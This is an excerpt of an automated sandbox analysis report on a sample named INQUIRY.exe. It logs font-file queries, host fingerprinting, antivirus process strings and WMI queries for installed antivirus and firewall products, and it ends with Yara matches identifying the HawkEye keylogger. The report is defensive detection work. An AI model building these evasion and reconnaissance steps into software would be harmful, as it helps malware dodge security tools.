                    Source: C:\Users\user\Desktop\INQUIRY.exeQueries volume information: C:\Windows\Fonts\LEELAWDB.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\INQUIRY.exeQueries volume information: C:\Windows\Fonts\MSUIGHUR.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\INQUIRY.exeQueries volume information: C:\Windows\Fonts\MSUIGHUB.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\INQUIRY.exeQueries volume information: C:\Windows\Fonts\WINGDNG2.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\INQUIRY.exeQueries volume information: C:\Windows\Fonts\WINGDNG3.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\INQUIRY.exeQueries volume information: C:\Windows\Fonts\TEMPSITC.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\INQUIRY.exeQueries volume information: C:\Windows\Fonts\PRISTINA.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\INQUIRY.exeQueries volume information: C:\Windows\Fonts\PAPYRUS.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\INQUIRY.exeQueries volume information: C:\Windows\Fonts\MISTRAL.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\INQUIRY.exeQueries volume information: C:\Windows\Fonts\LHANDW.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\INQUIRY.exeQueries volume information: C:\Windows\Fonts\ITCKRIST.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\INQUIRY.exeQueries volume information: C:\Windows\Fonts\JUICE___.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\INQUIRY.exeQueries volume information: C:\Windows\Fonts\FRSCRIPT.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\INQUIRY.exeQueries volume information: C:\Windows\Fonts\FREESCPT.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\INQUIRY.exeQueries volume information: C:\Windows\Fonts\BRADHITC.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\INQUIRY.exeQueries volume information: C:\Windows\Fonts\OUTLOOK.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\INQUIRY.exeQueries volume information: C:\Windows\Fonts\BKANT.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\INQUIRY.exeQueries volume information: C:\Windows\Fonts\ANTQUAI.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\INQUIRY.exeQueries volume information: C:\Windows\Fonts\ANTQUAB.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\INQUIRY.exeQueries volume information: C:\Windows\Fonts\ANTQUABI.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\INQUIRY.exeQueries volume information: C:\Windows\Fonts\GARA.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\INQUIRY.exeQueries volume information: C:\Windows\Fonts\GARAIT.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\INQUIRY.exeQueries volume information: C:\Windows\Fonts\GARABD.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\INQUIRY.exeQueries volume information: C:\Windows\Fonts\MTCORSVA.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\INQUIRY.exeQueries volume information: C:\Windows\Fonts\GOTHIC.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\INQUIRY.exeQueries volume information: C:\Windows\Fonts\GOTHICI.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\INQUIRY.exeQueries volume information: C:\Windows\Fonts\GOTHICB.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\INQUIRY.exeQueries volume information: C:\Windows\Fonts\GOTHICBI.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\INQUIRY.exeQueries volume information: C:\Windows\Fonts\ALGER.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\INQUIRY.exeQueries volume information: C:\Windows\Fonts\BASKVILL.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\INQUIRY.exeQueries volume information: C:\Windows\Fonts\BAUHS93.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\INQUIRY.exeQueries volume information: C:\Windows\Fonts\BELL.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\INQUIRY.exeQueries volume information: C:\Windows\Fonts\BELLI.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\INQUIRY.exeQueries volume information: C:\Windows\Fonts\BELLB.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\INQUIRY.exeQueries volume information: C:\Windows\Fonts\BRLNSR.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\INQUIRY.exeQueries volume information: C:\Windows\Fonts\BRLNSDB.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\INQUIRY.exeQueries volume information: C:\Windows\Fonts\BRLNSB.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\INQUIRY.exeQueries volume information: C:\Windows\Fonts\BERNHC.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\INQUIRY.exeQueries volume information: C:\Windows\Fonts\BOD_PSTC.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\INQUIRY.exeQueries volume information: C:\Windows\Fonts\BRITANIC.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\INQUIRY.exeQueries volume information: C:\Windows\Fonts\BROADW.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\INQUIRY.exeQueries volume information: C:\Windows\Fonts\BRUSHSCI.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\INQUIRY.exeQueries volume information: C:\Windows\Fonts\CALIFR.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\INQUIRY.exeQueries volume information: C:\Windows\Fonts\CALIFI.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\INQUIRY.exeQueries volume information: C:\Windows\Fonts\CALIFB.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\INQUIRY.exeQueries volume information: C:\Windows\Fonts\CENTAUR.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\INQUIRY.exeQueries volume information: C:\Windows\Fonts\CHILLER.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\INQUIRY.exeQueries volume information: C:\Windows\Fonts\COLONNA.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\INQUIRY.exeQueries volume information: C:\Windows\Fonts\COOPBL.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\INQUIRY.exeQueries volume information: C:\Windows\Fonts\FTLTLT.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\INQUIRY.exeQueries volume information: C:\Windows\Fonts\HARLOWSI.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\INQUIRY.exeQueries volume information: C:\Windows\Fonts\HARNGTON.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\INQUIRY.exeQueries volume information: C:\Windows\Fonts\HTOWERT.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\INQUIRY.exeQueries volume information: C:\Windows\Fonts\HTOWERTI.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\INQUIRY.exeQueries volume information: C:\Windows\Fonts\JOKERMAN.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\INQUIRY.exeQueries volume information: C:\Windows\Fonts\KUNSTLER.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\INQUIRY.exeQueries volume information: C:\Windows\Fonts\LBRITE.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\INQUIRY.exeQueries volume information: C:\Windows\Fonts\LBRITED.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\INQUIRY.exeQueries volume information: C:\Windows\Fonts\LBRITEI.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\INQUIRY.exeQueries volume information: C:\Windows\Fonts\LBRITEDI.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\INQUIRY.exeQueries volume information: C:\Windows\Fonts\LCALLIG.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\INQUIRY.exeQueries volume information: C:\Windows\Fonts\LFAX.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\INQUIRY.exeQueries volume information: C:\Windows\Fonts\LFAXD.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\INQUIRY.exeQueries volume information: C:\Windows\Fonts\LFAXI.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\INQUIRY.exeQueries volume information: C:\Windows\Fonts\LFAXDI.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\INQUIRY.exeQueries volume information: C:\Windows\Fonts\MAGNETOB.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\INQUIRY.exeQueries volume information: C:\Windows\Fonts\MATURASC.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\INQUIRY.exeQueries volume information: C:\Windows\Fonts\MOD20.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\INQUIRY.exeQueries volume information: C:\Windows\Fonts\NIAGENG.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\INQUIRY.exeQueries volume information: C:\Windows\Fonts\NIAGSOL.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\INQUIRY.exeQueries volume information: C:\Windows\Fonts\OLDENGL.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\INQUIRY.exeQueries volume information: C:\Windows\Fonts\ONYX.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\INQUIRY.exeQueries volume information: C:\Windows\Fonts\PARCHM.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\INQUIRY.exeQueries volume information: C:\Windows\Fonts\PLAYBILL.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\INQUIRY.exeQueries volume information: C:\Windows\Fonts\POORICH.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\INQUIRY.exeQueries volume information: C:\Windows\Fonts\RAVIE.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\INQUIRY.exeQueries volume information: C:\Windows\Fonts\INFROMAN.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\INQUIRY.exeQueries volume information: C:\Windows\Fonts\SHOWG.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\INQUIRY.exeQueries volume information: C:\Windows\Fonts\SNAP____.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\INQUIRY.exeQueries volume information: C:\Windows\Fonts\STENCIL.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\INQUIRY.exeQueries volume information: C:\Windows\Fonts\VINERITC.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\INQUIRY.exeQueries volume information: C:\Windows\Fonts\VIVALDII.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\INQUIRY.exeQueries volume information: C:\Windows\Fonts\VLADIMIR.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\INQUIRY.exeQueries volume information: C:\Windows\Fonts\LATINWD.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\INQUIRY.exeQueries volume information: C:\Windows\Fonts\TCM_____.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\INQUIRY.exeQueries volume information: C:\Windows\Fonts\TCMI____.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\INQUIRY.exeQueries volume information: C:\Windows\Fonts\TCB_____.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\INQUIRY.exeQueries volume information: C:\Windows\Fonts\TCBI____.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\INQUIRY.exeQueries volume information: C:\Windows\Fonts\TCCM____.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\INQUIRY.exeQueries volume information: C:\Windows\Fonts\TCCB____.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\INQUIRY.exeQueries volume information: C:\Windows\Fonts\TCCEB.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\INQUIRY.exeQueries volume information: C:\Windows\Fonts\SCRIPTBL.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\INQUIRY.exeQueries volume information: C:\Windows\Fonts\ROCK.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\INQUIRY.exeQueries volume information: C:\Windows\Fonts\ROCKI.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\INQUIRY.exeQueries volume information: C:\Windows\Fonts\ROCKB.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\INQUIRY.exeQueries volume information: C:\Windows\Fonts\ROCKEB.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\INQUIRY.exeQueries volume information: C:\Windows\Fonts\ROCKBI.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\INQUIRY.exeQueries volume information: C:\Windows\Fonts\ROCC____.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\INQUIRY.exeQueries volume information: C:\Windows\Fonts\ROCCB___.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\INQUIRY.exeQueries volume information: C:\Windows\Fonts\RAGE.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\INQUIRY.exeQueries volume information: C:\Windows\Fonts\PERTILI.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\INQUIRY.exeQueries volume information: C:\Windows\Fonts\PERTIBD.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\INQUIRY.exeQueries volume information: C:\Windows\Fonts\PER_____.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\INQUIRY.exeQueries volume information: C:\Windows\Fonts\PERI____.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\INQUIRY.exeQueries volume information: C:\Windows\Fonts\PERB____.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\INQUIRY.exeQueries volume information: C:\Windows\Fonts\PERBI___.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\INQUIRY.exeQueries volume information: C:\Windows\Fonts\PALSCRI.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\INQUIRY.exeQueries volume information: C:\Windows\Fonts\OCRAEXT.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\INQUIRY.exeQueries volume information: C:\Windows\Fonts\MAIAN.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\INQUIRY.exeQueries volume information: C:\Windows\Fonts\LTYPE.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\INQUIRY.exeQueries volume information: C:\Windows\Fonts\LTYPEO.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\INQUIRY.exeQueries volume information: C:\Windows\Fonts\LTYPEB.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\INQUIRY.exeQueries volume information: C:\Windows\Fonts\LTYPEBO.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\INQUIRY.exeQueries volume information: C:\Windows\Fonts\LSANS.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\INQUIRY.exeQueries volume information: C:\Windows\Fonts\LSANSD.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\INQUIRY.exeQueries volume information: C:\Windows\Fonts\LSANSI.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\INQUIRY.exeQueries volume information: C:\Windows\Fonts\LSANSDI.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\INQUIRY.exeQueries volume information: C:\Windows\Fonts\IMPRISHA.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\INQUIRY.exeQueries volume information: C:\Windows\Fonts\HATTEN.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\INQUIRY.exeQueries volume information: C:\Windows\Fonts\GOUDYSTO.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\INQUIRY.exeQueries volume information: C:\Windows\Fonts\GOUDOS.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\INQUIRY.exeQueries volume information: C:\Windows\Fonts\GOUDOSI.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\INQUIRY.exeQueries volume information: C:\Windows\Fonts\GOUDOSB.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\INQUIRY.exeQueries volume information: C:\Windows\Fonts\GLECB.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\INQUIRY.exeQueries volume information: C:\Windows\Fonts\GIL_____.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\INQUIRY.exeQueries volume information: C:\Windows\Fonts\GILI____.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\INQUIRY.exeQueries volume information: C:\Windows\Fonts\GILB____.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\INQUIRY.exeQueries volume information: C:\Windows\Fonts\GILBI___.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\INQUIRY.exeQueries volume information: C:\Windows\Fonts\GILC____.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\INQUIRY.exeQueries volume information: C:\Windows\Fonts\GLSNECB.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\INQUIRY.exeQueries volume information: C:\Windows\Fonts\GIGI.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\INQUIRY.exeQueries volume information: C:\Windows\Fonts\FRABK.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\INQUIRY.exeQueries volume information: C:\Windows\Fonts\FRABKIT.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\INQUIRY.exeQueries volume information: C:\Windows\Fonts\FORTE.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\INQUIRY.exeQueries volume information: C:\Windows\Fonts\FELIXTI.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\INQUIRY.exeQueries volume information: C:\Windows\Fonts\ERASMD.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\INQUIRY.exeQueries volume information: C:\Windows\Fonts\ERASLGHT.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\INQUIRY.exeQueries volume information: C:\Windows\Fonts\ERASDEMI.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\INQUIRY.exeQueries volume information: C:\Windows\Fonts\ERASBD.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\INQUIRY.exeQueries volume information: C:\Windows\Fonts\ENGR.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\INQUIRY.exeQueries volume information: C:\Windows\Fonts\ELEPHNT.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\INQUIRY.exeQueries volume information: C:\Windows\Fonts\ELEPHNTI.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\INQUIRY.exeQueries volume information: C:\Windows\Fonts\ITCEDSCR.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\INQUIRY.exeQueries volume information: C:\Windows\Fonts\CURLZ___.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\INQUIRY.exeQueries volume information: C:\Windows\Fonts\COPRGTL.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\INQUIRY.exeQueries volume information: C:\Windows\Fonts\COPRGTB.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\INQUIRY.exeQueries volume information: C:\Windows\Fonts\CENSCBK.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\INQUIRY.exeQueries volume information: C:\Windows\Fonts\SCHLBKI.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\INQUIRY.exeQueries volume information: C:\Windows\Fonts\SCHLBKB.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\INQUIRY.exeQueries volume information: C:\Windows\Fonts\SCHLBKBI.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\INQUIRY.exeQueries volume information: C:\Windows\Fonts\CASTELAR.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\INQUIRY.exeQueries volume information: C:\Windows\Fonts\CALIST.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\INQUIRY.exeQueries volume information: C:\Windows\Fonts\CALISTI.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\INQUIRY.exeQueries volume information: C:\Windows\Fonts\CALISTB.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\INQUIRY.exeQueries volume information: C:\Windows\Fonts\CALISTBI.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\INQUIRY.exeQueries volume information: C:\Windows\Fonts\BOOKOS.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\INQUIRY.exeQueries volume information: C:\Windows\Fonts\BOOKOSB.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\INQUIRY.exeQueries volume information: C:\Windows\Fonts\BOOKOSI.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\INQUIRY.exeQueries volume information: C:\Windows\Fonts\BOOKOSBI.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\INQUIRY.exeQueries volume information: C:\Windows\Fonts\BOD_R.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\INQUIRY.exeQueries volume information: C:\Windows\Fonts\BOD_I.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\INQUIRY.exeQueries volume information: C:\Windows\Fonts\BOD_B.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\INQUIRY.exeQueries volume information: C:\Windows\Fonts\BOD_BI.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\INQUIRY.exeQueries volume information: C:\Windows\Fonts\BOD_CR.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\INQUIRY.exeQueries volume information: C:\Windows\Fonts\BOD_BLAR.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\INQUIRY.exeQueries volume information: C:\Windows\Fonts\BOD_CI.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\INQUIRY.exeQueries volume information: C:\Windows\Fonts\BOD_CB.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\INQUIRY.exeQueries volume information: C:\Windows\Fonts\BOD_BLAI.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\INQUIRY.exeQueries volume information: C:\Windows\Fonts\BOD_CBI.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\INQUIRY.exeQueries volume information: C:\Windows\Fonts\ITCBLKAD.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\INQUIRY.exeQueries volume information: C:\Windows\Fonts\ARLRDBD.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\INQUIRY.exeQueries volume information: C:\Windows\Fonts\AGENCYR.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\INQUIRY.exeQueries volume information: C:\Windows\Fonts\AGENCYB.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\INQUIRY.exeQueries volume information: C:\Windows\Fonts\BSSYM7.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\INQUIRY.exeQueries volume information: C:\Windows\Fonts\REFSAN.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\INQUIRY.exeQueries volume information: C:\Windows\Fonts\REFSPCL.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\INQUIRY.exeQueries volume information: C:\Windows\Fonts\MTEXTRA.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\INQUIRY.exeQueries volume information: C:\Windows\Fonts\marlett.ttf VolumeInformation
                    Source: C:\Users\user\Desktop\INQUIRY.exeQueries volume information: C:\Windows\Fonts\micross.ttf VolumeInformation
                    Source: C:\Users\user\Desktop\INQUIRY.exeCode function: 0_2_0040697A GetSystemTime,
                    Source: C:\Users\user\Desktop\INQUIRY.exeCode function: 0_2_0040697A GetSystemTime,
                    Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exeCode function: 5_2_0040724C memset,memset,memset,memset,GetComputerNameA,GetUserNameA,MultiByteToWideChar,MultiByteToWideChar,MultiByteToWideChar,strlen,strlen,memcpy,
                    Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exeCode function: 5_2_0040724C memset,memset,memset,memset,GetComputerNameA,GetUserNameA,MultiByteToWideChar,MultiByteToWideChar,MultiByteToWideChar,strlen,strlen,memcpy,
                    Source: C:\Users\user\Desktop\INQUIRY.exeCode function: 0_2_00441B28 GetVersion,
                    Source: C:\Users\user\Desktop\INQUIRY.exeCode function: 0_2_00441B28 GetVersion,
                    Source: C:\Users\user\Desktop\INQUIRY.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid
                    Source: C:\Users\user\Desktop\INQUIRY.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid
                    Source: INQUIRY.exe, 00000011.00000002.835872619.000000000019D000.00000004.00000010.sdmpBinary or memory string: avp.exe
                    Source: INQUIRY.exe, 00000010.00000002.825678890.00000000008CC000.00000004.00000020.sdmpBinary or memory string: r\MsMpeng.exe
                    Source: INQUIRY.exe, 00000010.00000002.825678890.00000000008CC000.00000004.00000020.sdmpBinary or memory string: %ProgramFiles%\Windows Defender\MsMpeng.exe
                    Source: INQUIRY.exe, 00000011.00000002.835872619.000000000019D000.00000004.00000010.sdmpBinary or memory string: avp.exe
                    Source: INQUIRY.exe, 00000010.00000002.825678890.00000000008CC000.00000004.00000020.sdmpBinary or memory string: r\MsMpeng.exe
                    Source: INQUIRY.exe, 00000010.00000002.825678890.00000000008CC000.00000004.00000020.sdmpBinary or memory string: %ProgramFiles%\Windows Defender\MsMpeng.exe
                    Source: C:\Users\user\Desktop\INQUIRY.exeWMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : SELECT * FROM AntivirusProduct
                    Source: C:\Users\user\Desktop\INQUIRY.exeWMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : SELECT * FROM FirewallProduct
                    Source: C:\Users\user\Desktop\INQUIRY.exeWMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : SELECT * FROM AntivirusProduct
                    Source: C:\Users\user\Desktop\INQUIRY.exeWMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : SELECT * FROM FirewallProduct
                    Source: C:\Users\user\Desktop\INQUIRY.exeWMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : SELECT * FROM AntivirusProduct
                    Source: C:\Users\user\Desktop\INQUIRY.exeWMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : SELECT * FROM FirewallProduct
                    Source: C:\Users\user\Desktop\INQUIRY.exeWMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : SELECT * FROM AntivirusProduct
                    Source: C:\Users\user\Desktop\INQUIRY.exeWMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : SELECT * FROM FirewallProduct
                    Source: C:\Users\user\Desktop\INQUIRY.exeWMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : SELECT * FROM AntivirusProduct
                    Source: C:\Users\user\Desktop\INQUIRY.exeWMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : SELECT * FROM FirewallProduct
                    Source: C:\Users\user\Desktop\INQUIRY.exeWMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : SELECT * FROM AntivirusProduct
                    Source: C:\Users\user\Desktop\INQUIRY.exeWMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : SELECT * FROM FirewallProduct
                    Source: C:\Users\user\Desktop\INQUIRY.exeWMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : SELECT * FROM AntivirusProduct
                    Source: C:\Users\user\Desktop\INQUIRY.exeWMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : SELECT * FROM FirewallProduct
                    Source: C:\Users\user\Desktop\INQUIRY.exeWMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : SELECT * FROM AntivirusProduct
                    Source: C:\Users\user\Desktop\INQUIRY.exeWMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : SELECT * FROM FirewallProduct

                    Stealing of Sensitive Information:

                    barindex
                    Yara detected HawkEye KeyloggerShow sources
                    Source: Yara matchFile source: 00000010.00000002.825855451.00000000022E0000.00000004.00000001.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000001.00000002.737101791.0000000002272000.00000004.00000001.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000021.00000002.923851920.0000000002210000.00000004.00000001.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000010.00000001.752146287.00000000004D2000.00000040.00020000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000010.00000002.828298688.0000000002E11000.00000004.00000001.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000020.00000002.875783315.0000000002717000.00000040.00000001.sdmp, type: MEMORY
                    Source: Yara matchFile source: 0000001C.00000002.859116925.00000000007A0000.00000004.00000001.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000001.00000002.735055042.0000000000402000.00000040.00000001.sdmp, type: MEMORY
                    Source: Yara matchFile source: 0000001C.00000002.858712668.0000000000402000.00000040.00000001.sdmp, type: MEMORY
                    Source: Yara matchFile source: 0000001B.00000002.849214765.00000000026D7000.00000040.00000001.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000021.00000002.919336144.0000000000402000.00000040.00000001.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000000.00000002.656291540.0000000002642000.00000040.00000001.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000020.00000002.875508614.0000000002682000.00000040.00000001.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000009.00000002.731445229.0000000005040000.00000004.00000001.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000001.00000002.735183511.0000000000497000.00000040.00000001.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000021.00000001.871375197.00000000004D2000.00000040.00020000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 0000000D.00000002.756918468.0000000002662000.00000040.00000001.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000001.00000002.736771009.00000000021E0000.00000004.00000001.sdmp, type: MEMORY
                    Source: Yara matchFile source: 0000001C.00000001.839775376.00000000004D2000.00000040.00020000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 0000001C.00000002.858806395.0000000000497000.00000040.00000001.sdmp, type: MEMORY
                    Source: Yara matchFile source: 0000001C.00000002.863200098.0000000002DDA000.00000004.00000001.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000010.00000002.826009202.0000000002372000.00000004.00000001.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000021.00000002.927425340.0000000002382000.00000040.00000001.sdmp, type: MEMORY
